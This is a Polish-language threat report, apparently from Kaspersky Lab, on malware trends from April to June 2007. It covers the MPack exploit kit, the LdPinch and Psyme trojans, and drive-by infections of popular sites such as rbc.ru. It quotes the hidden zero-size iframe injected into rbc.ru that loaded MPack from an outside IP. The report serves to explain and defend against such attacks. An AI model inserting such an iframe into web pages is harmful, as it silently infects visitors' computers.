Ewolucja złośliwego oprogramowania IV-VI 2007

Przeczytaj także: Ewolucja złośliwego oprogramowania I-III 2007

Analizując te strony, eksperci z firmy Kaspersky Lab znaleźli kod w odnośniku prowadzący do strony zarejestrowanej w domenie pp.se. Przy użyciu tego odnośnika znaleziono skrypt wykorzystujący lukę opisaną w biuletynie Microsoft Security Advisory (926043).

Exploit pobierał najnowszą wersję trojana Trojan-PSW.Win32.LdPinch - ayj.

W grudniu 2006 r. eksperci z firmy Kaspersky Lab znaleźli co najmniej 470 serwerów zainfekowanych trojanem Trojan-Downloader.JS.Psyme, z których wszystkie wykorzystywały usługi firmy hostingowej Valuehost. Jednym z zainfekowanych zasobów okazał się popularny serwis www.5757.ru.

Gdy użytkownicy Internetu odwiedzali zainfekowane witryny, skrypt, który został wbudowany w stronę przez szkodliwych użytkowników, zaczynał pobierać trojana Trojan-Downloader.JS.Psyme.ct, który pobierał następnie inne szkodliwe programy na zaatakowany komputer.

Kilka dni przed tym, jak wystąpiły problemy we Włoszech, specjaliści z Kaspersky Lab odnotowali podobny incydent w Rosji, również tym razem dotyczył on popularnej strony internetowej RBC.ru.

7 czerwca 2007 r. wielu użytkowników, którzy odwiedzili rbc.ru ujrzało ostrzeżenie antywirusowe informujące o próbie zainfekowania systemu przez trojana. Szczegółowa analiza wykazała, że strona główna zawierała następujący kod:
< iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0 >< /iframe >

Eksperci byli zaskoczeni, że Mpack zdołał przedostać się poza granice Rosji i był wykorzystywany we Włoszech. Oto dlaczego:

• Mpack został stworzony w Rosji. Rosyjscy hakerzy sprzedali go innym rosyjskim hakerom.
• Jego autorzy to osoby, które aktywnie uczestniczyły w tworzeniu i wspieraniu innego rozpowszechnionego trojana, LdPinch.
• Na czarnym rynku znajduje się kilka podobnych exploitów: Q406 Roll-up package, MDAC, WebAttacker itd. Wszystkie z nich są o wiele "skuteczniejsze" niż Mpack.

Według Kaspersky Lab istnieje kolekcja exploitów, które zostały napisane w PHP (lub innym języku skryptowym, takim jak VBS czy JS). Kolekcja ta zawiera kilka exploitów, które wykorzystują luki w zabezpieczeniach popularnych przeglądarek oraz systemów operacyjnych. Najprostsza kolekcja może zawierać następujące exploity:

• MS06-014 dla Internet Explorera 6
• MS06-006 dla Firefoxa 1.5
• MS06-006 dla Opery 7
• WMF Overflow
• QuickTime Overflow
• WinZip Overflow
• VML Overflow

Exploity te są zazwyczaj zaszyfrowane w celu obejścia programów antywirusowych oraz utrudnienia ich wykrycia i analizy.

Szkodliwi użytkownicy umieszczają na swoich witrynach gotowy zestaw exploitów i próbują nakłonić użytkowników do ich odwiedzenia. Do tego celu wykorzystywane są inne witryny. Szkodliwy użytkownik uzyska dostęp do innych witryn, zazwyczaj poprzez wykorzystanie kont dostępu skradzionych wcześniej przez trojana, takiego jak LdPinch.